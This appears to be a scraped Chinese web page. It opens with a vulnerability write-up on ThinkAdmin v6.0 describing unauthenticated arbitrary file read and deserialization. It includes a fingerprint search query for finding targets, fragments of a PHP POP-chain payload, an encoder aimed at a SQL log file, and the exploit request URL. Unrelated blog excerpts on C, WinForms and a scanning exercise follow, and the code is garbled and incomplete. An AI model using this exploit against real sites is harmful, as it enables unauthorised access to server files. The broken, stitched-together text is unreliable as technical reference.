0x00 漏洞原理
外掛程式控制器未加認證,直接無需認證利用,github提的issue說是任意檔案讀取,其實再早之前還有反序列化
0x01 漏洞影響
0x02 cms搜尋規則
title="thinkadmin" && body="v6.0"0x03 漏洞利用反序列化測試鍊子發現mac和win都可以觸發,唯獨在linux下用不了,原因是__destruct觸發不了
後請教了一下七月火師傅,將序列化本來直接傳object改成傳陣列解決了
1<?php
2namespace think;
3use
think\model\pivot;
4abstract
class
model30}
31namespace think\model;
32use
think\model;33#
model 是乙個抽象類,我們找到它的繼承類,此處選取的是 pivot 類
任意檔案讀取
encode**:
1payload:<?php
2function encode($content)3
8echo encode('runtime/admin/log/single_sql.log');
9 ?>
/admin/login.html?s=admin/api.update/get/encode/加密的字串cpp學習(6)(讀教材找漏洞)
1 c語言程式可以分成三層 程式 數個.c檔案 以及輔助的.件 函式 函式外面定義int static int int f int 函式裡面定義的量 static int a,則a可以被本檔案訪問,但是無法被本工程的其他檔案訪問 對於變數作用域可以看下這片文章 2 c語言的記憶體使用情況 c在使用的...
2023年6月C winform專案開發總結
datagridview中如果多出一行 則將allowusertoaddrows 屬性設為false 用做為背景圖會出現抖動現象,將窗體的doublebuffered 雙快取處理設為true。控制項的 dock屬性 獲取或設定哪些邊框停靠父容器並隨父容器變大變小。sendtoback 將控制項傳送到...
20155339 Exp6 資訊蒐集與漏洞掃瞄
1 哪些組織負責dns,ip的管理。2 什麼是3r資訊。是指註冊人 registrant 註冊商 registrar 以及官方註冊局 registry 3 評價下掃瞄結果的準確性。個人認為掃瞄的還是比較準確的吧,與自己所知道的地方沒有發現不符的。發現這門課越學越害怕,之前學的東西好歹也是假裝很高階的...